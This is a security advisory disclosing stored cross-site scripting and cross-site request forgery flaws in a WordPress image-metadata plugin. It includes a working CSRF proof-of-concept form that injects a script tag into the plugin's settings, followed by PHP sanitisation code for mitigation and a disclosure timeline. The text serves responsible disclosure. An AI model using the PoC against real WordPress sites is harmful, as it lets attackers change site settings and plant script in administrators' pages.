https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS))
After installing the plugin
Stored XSS:
This plugin is also vulnerable to a CSRF attack; below is the PoC for the same.
<html>
<body>
<form action="http://localhost/wordpress/wp-admin/options.php" method="POST">
<input type="hidden" name="option_page" value="image_metadata_cruncher_title" />
<input type="hidden" name="action" value="update" />
<input type="hidden" name="_wpnonce" value="0061596f3e" />
<input type="hidden" name="_wp_http_referer" value="/wordpress/wp-admin/plugins.php?page=image_metadata_cruncher-options" />
<input type="hidden" name="option_page" value="image_metadata_cruncher_alt" />
<input type="hidden" name="action" value="update" />
<input type="hidden" name="_wpnonce" value="d3134676c2" />
<input type="hidden" name="_wp_http_referer" value="/wordpress/wp-admin/plugins.php?page=image_metadata_cruncher-options" />
<input type="hidden" name="image_metadata_cruncher[enable_highlighting]" value="enable" />
<input type="hidden" name="image_metadata_cruncher[title]" value="{ IPTC:Headline }" />
<input type="hidden" name="image_metadata_cruncher[alt]" value="<script>alert(&quot;1&quot;)</script>" />
<input type="hidden" name="image_metadata_cruncher[caption]" value="alert(&quot;1&quot;)" />
<input type="hidden" name="image_metadata_cruncher[description]" value="{ IPTC:Caption | EXIF:ImageDescription }" />
<input type="hidden" name="submit" value="Save Changes" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
The next time you navigate to the page, you will see the XSS in action. Cheers.
Mitigation:
The developer will fix this in the next release.
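One way the stored XSS side of this issue can be closed, as an added example that is not the plugin's code or the developer's fix: strip markup from the template fields before they are saved and encode them again at output. The field names come from the PoC form above; the function names imc_sanitize_options() and imc_render_attr() are hypothetical, and the sample input is constructed.

```php
<?php
// Added example, not the plugin's code. Function names are hypothetical.
const IMC_TEXT_FIELDS = ['title', 'alt', 'caption', 'description'];

/**
 * Sanitise the submitted image_metadata_cruncher[...] array before storage.
 * In WordPress this would be passed as the 'sanitize_callback' of register_setting().
 */
function imc_sanitize_options($input): array
{
    $clean = [];
    if (!is_array($input)) {
        return $clean;
    }
    // Checkbox-style flag: accept only the one expected value.
    if (($input['enable_highlighting'] ?? '') === 'enable') {
        $clean['enable_highlighting'] = 'enable';
    }
    foreach (IMC_TEXT_FIELDS as $key) {   // keys outside the allowlist are dropped
        $value = $input[$key] ?? '';
        if (!is_string($value)) {
            continue;                     // drop nested arrays and other types
        }
        // Template fields hold plain text plus { IPTC:... } tags; no markup is needed.
        $value = strip_tags($value);
        // Remove control characters but keep tab, LF and CR.
        $value = preg_replace('/[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]/', '', $value);
        $clean[$key] = trim((string) $value);
    }
    return $clean;
}

/** Encode a stored value for an HTML attribute or text context at output time. */
function imc_render_attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed sample input mirroring the PoC form fields.
$posted = [
    'enable_highlighting' => 'enable',
    'title'   => '{ IPTC:Headline }',
    'alt'     => '<script>alert("1")</script>',
    'caption' => 'alert("1")',
    'unknown' => 'not in the allowlist',
];
foreach (imc_sanitize_options($posted) as $key => $value) {
    echo $key, ' => ', imc_render_attr($value), PHP_EOL;
}
```

Sanitising on save and encoding on output are independent layers: the second still protects pages that render values stored before the first was in place.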
1-Feb-2015 Reported to developer
2-Feb-2015 Acknowledgement from developer
8-Feb-2015 Asked developer for an update
13-Feb-2015 Informed developer about public disclosure, with confirmation of patching this in the next release
14-Feb-2015 Informed Bugtraq, public disclosure
17-Feb-2015 Reposting with CVE and CSRF PoC
#credits:
Kaustubh Padwad
Information Security Researcher
[email protected]
https://twitter.com/s3curityb3ast
http://breakthesec.com
https://www.linkedin.com/in/kaustubhpadwad